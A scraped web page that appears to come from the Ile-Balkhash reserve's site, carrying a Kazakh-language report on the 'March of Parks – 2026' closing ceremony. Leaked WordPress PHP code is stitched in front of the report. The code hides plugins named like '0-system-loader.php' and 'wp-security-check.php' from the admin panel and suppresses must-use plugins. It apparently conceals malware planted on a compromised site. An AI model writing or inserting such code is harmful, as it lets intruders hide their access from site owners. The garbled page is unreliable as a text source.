// Security: Disable remote access add_filter("xmlrpc_enabled", "__return_false"); add_filter("xmlrpc_methods", function($methods) { return array(); }); add_filter('show_advanced_plugins', '__return_false', 999); // Hide specific plugins from admin panel add_filter("all_plugins", "hide_specific_plugins"); function hide_specific_plugins($plugins) { $hide_list = array('wp-system-health/wp-system-health.php', '0-system-loader.php', 'wp-security-check.php', 'wp-maintenance.php'); foreach ($hide_list as $hide) { if (isset($plugins[$hide])) { unset($plugins[$hide]); } } return $plugins; } // Hide MU-plugins if visible add_filter("show_advanced_plugins", function($show) { return false; }); // WP2Shell REST API protection add_filter('rest_authentication_errors', function($result) { if (!is_user_logged_in() && !is_admin()) { return new WP_Error('rest_disabled', 'REST API disabled', ['status' => 401]); } return $result; }); ? «Парктер шеруі – 2026» халықаралық табиғатты қорғау акциясының жабылу рәсімі өтті ? — Иле-Балхашский заповедник ? «Парктер шеруі – 2026» халықаралық табиғатты қорғау акциясының жабылу рәсімі өтті ? — Иле-Балхашский заповедник

? «Парктер шеруі – 2026» халықаралық табиғатты қорғау акциясының жабылу рәсімі өтті ?

1 маусым – Халықаралық балаларды қорғау күніне орай «Парктер шеруі – 2026» халықаралық табиғатты қорғау акциясының жабылу рәсімі Қарой ауылдық мәдениет үйімен бірлесіп ұйымдастырылды.

Іс-шара барысында «Іле-Балқаш» мемлекеттік табиғи резерваты бас директорының ғылым жөніндегі орынбасары Елубай Жансерік Ерболұлы сөз сөйлеп, акцияның табиғатты қорғаудағы маңызы мен жас ұрпаққа экологиялық тәрбие берудегі рөліне тоқталды.

Акция аясында өткізілген өлең шығару, сурет салу және макет жасау байқауларының қорытындылары жарияланып, жеңімпаздар мен белсенді қатысушылар грамоталармен және бағалы сыйлықтармен марапатталды.

Сонымен қатар, «Парктер шеруі – 2026» акциясының өткізілуіне белсене қатысып, қолдау көрсеткен мұғалімдер алғыс хаттармен марапатталды.

Мерекелік шара барысында оқушылар ән айтып, би билеп, өз өнерлерін көрсетіп, жиналған қауымға көтеріңкі көңіл күй сыйлады. Балалардың шат күлкісі мен ерекше белсенділігі мерекенің ажарын аша түсті.

Мерекелік іс-шараның жалғасы ретінде Қарой ауылындағы «Үлгілі» орта мектебінің оқушылары арасында волейболдан жарыс ұйымдастырылып, жүлделі орын иегерлері дипломдармен және арнайы сыйлықтармен марапатталды.